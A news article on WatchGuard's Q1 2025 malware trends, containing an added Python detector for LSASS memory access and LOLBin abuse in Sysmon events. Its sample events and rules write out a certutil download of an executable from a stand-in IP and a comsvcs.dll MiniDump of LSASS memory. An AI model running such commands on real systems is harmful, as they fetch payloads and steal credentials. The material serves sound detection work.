New threat intelligence released by WatchGuard Technologies has revealed a significant uptick in malware activity in the first quarter of 2025 (Q1 2025), pointing to a rapidly shifting cyber risk environment.
The data, compiled in WatchGuard’s Internet Security Report, recorded a 171% quarter-on-quarter rise in unique malware detections – the highest observed by the firm’s threat lab since tracking began.
The report highlighted a pronounced increase in evasive malware: detections by WatchGuard’s machine learning-based IntelligentAV engine, which catches samples that signature matching misses, grew 323% over the same period.
According to the findings, conventional security models reliant on known threat signatures are being circumvented as attackers intensify the use of obfuscation and encryption to deliver malware through encrypted traffic.
Corey Nachreiner, chief security officer at WatchGuard, said cyber criminals are now capable of launching precise, large-scale campaigns with the help of AI.
“Attackers now have the capabilities to launch highly targeted campaigns at scale using automated pipelines, emphasising the need for organisations to adopt robust, precise, and powerful security measures to stay ahead of the advancements in AI and the evolving cyber risks,” he said.
The analysis noted a 712% jump in new malware strains targeting endpoints – an increase that comes after several quarters of decline.
Among the most prominent threats was the LSASS dumper, a credential-harvesting tool that reads the memory of the Local Security Authority Subsystem Service (lsass.exe) to extract cached logon credentials. Because lsass.exe is a user-mode process, the tool needs elevated rights (typically local administrator or SeDebugPrivilege) to open it rather than any kernel manipulation, which makes handle requests against lsass.exe a reliable detection point.
While ransomware volumes dropped 85% over the quarter, the emergence of Termite ransomware as a leading detection suggests that attackers are modifying their approach.
Rather than relying solely on encrypting data, threat actors are shifting to data theft and extortion, a response to improvements in enterprise backup and recovery that have blunted the leverage of encryption alone.
TLS-based malware activity also rose, with encrypted channels becoming a key vector.
Trojan.Agent.FZPI – a malicious HTML file leveraging both encryption and social engineering – was the top detection in this category. This malware blends known techniques into phishing payloads that mimic legitimate documents while evading detection.
Other notable trends included a decline in script-based malware, historically a dominant method, which fell to record lows.
In its place, attackers are increasingly using “Living off the Land” methods – employing legitimate tools that ship with Windows to carry out malicious activity while blending in with routine administration.
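The two endpoint techniques the report names above, LSASS credential dumping and Living-off-the-Land binary abuse, both surface in the same process telemetry, so the following added example (written for this page, not code from WatchGuard or the report) shows detection logic for both over a handful of constructed Sysmon-style events. It assumes Sysmon Event ID 10 (ProcessAccess) and Event ID 1 (ProcessCreate) fields; the allowlist, the LOLBin set and the sample events are assumptions to be tuned per estate.

```python
"""Detection logic for LSASS memory access and LOLBin abuse over Sysmon-style events.

Added example for this page; the events below are constructed, not real telemetry.
"""
import re

# Process access right a memory-dumping tool must hold on lsass.exe.
# MiniDumpWriteDump needs PROCESS_QUERY_INFORMATION | PROCESS_VM_READ; VM_READ
# (0x0010) is the bit that matters, and PROCESS_ALL_ACCESS (0x1FFFFF) includes it.
PROCESS_VM_READ = 0x0010

# Windows binaries routinely abused for download/execution (assumed set; extend as needed).
LOLBINS = {
    "certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
    "bitsadmin.exe", "wscript.exe", "cscript.exe", "powershell.exe",
}

# Images that legitimately open lsass.exe with read access (assumption: tune per estate).
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Command-line patterns that turn a benign system tool into a delivery or dump mechanism.
SUSPICIOUS_CMD = [
    (re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I), "certutil download"),
    (re.compile(r"comsvcs\.dll,?\s*(minidump|#24)", re.I), "comsvcs.dll MiniDump of LSASS"),
    (re.compile(r"regsvr32(\.exe)?\b.*/i:https?://", re.I), "regsvr32 remote scriptlet"),
    (re.compile(r"powershell(\.exe)?\b.*-enc", re.I), "encoded PowerShell"),
    (re.compile(r"mshta(\.exe)?\b.*https?://", re.I), "mshta remote HTA"),
]


def check_process_access(event):
    """Sysmon Event ID 10: flag non-allowlisted images opening lsass.exe with VM_READ."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in LSASS_ALLOWLIST:
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs a hex string
    if granted & PROCESS_VM_READ:
        return f"LSASS handle with VM_READ from {source} (0x{granted:X})"
    return None


def check_process_create(event):
    """Sysmon Event ID 1: flag LOLBins whose command line matches an abuse pattern."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return None
    cmd = event.get("CommandLine", "")
    for pattern, label in SUSPICIOUS_CMD:
        if pattern.search(cmd):
            return f"{label}: {cmd}"
    return None


def triage(events):
    """Return (EventID, finding) pairs for every event that trips a rule."""
    hits = []
    for event in events:
        if event.get("EventID") == 10:
            finding = check_process_access(event)
        elif event.get("EventID") == 1:
            finding = check_process_create(event)
        else:
            finding = None
        if finding:
            hits.append((event["EventID"], finding))
    return hits


# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\dumper.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\l.dmp full"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -hashfile setup.msi SHA256"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event_id, finding in triage(SAMPLE_EVENTS):
        print(f"EID {event_id}: {finding}")
```

The allowlist is keyed on the full lowercased image path rather than the file name so that a dumper renamed to MsMpEng.exe in a user-writable directory still fires; the legitimate certutil hash check and the unrelated notepad launch produce no findings, which is the signal-to-noise behaviour a detection engineer should confirm before deploying a rule like this.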
The total number of unique network attack signatures fell 16% from the previous quarter, suggesting that attackers are focusing on exploiting a smaller set of known vulnerabilities – particularly legacy systems that remain unpatched.
Meanwhile, Application.Cashback.B.0835E4A4, a new malware family, was identified as the most widespread globally, indicating a need for region-specific defence strategies.
Malicious activity via email remains a prominent delivery mechanism, as generative AI enables attackers to develop increasingly convincing phishing content.
WatchGuard reported higher detection rates from AI-driven defences, which are proving essential in identifying threats at the network edge and on endpoints.
The timing of the report aligns with findings from Beazley’s latest Risk & Resilience study, which found that 29% of global executives now rank cyber as their top risk – up from 26% in 2024.
Despite this, 83% of surveyed leaders expressed confidence in their organisation’s cyber defences.
The Beazley report warned that this optimism may not fully align with the realities of the current cyber landscape.
It cited the growing use of AI in cybercrime, vulnerabilities in third-party systems, and politically motivated attacks as areas of concern.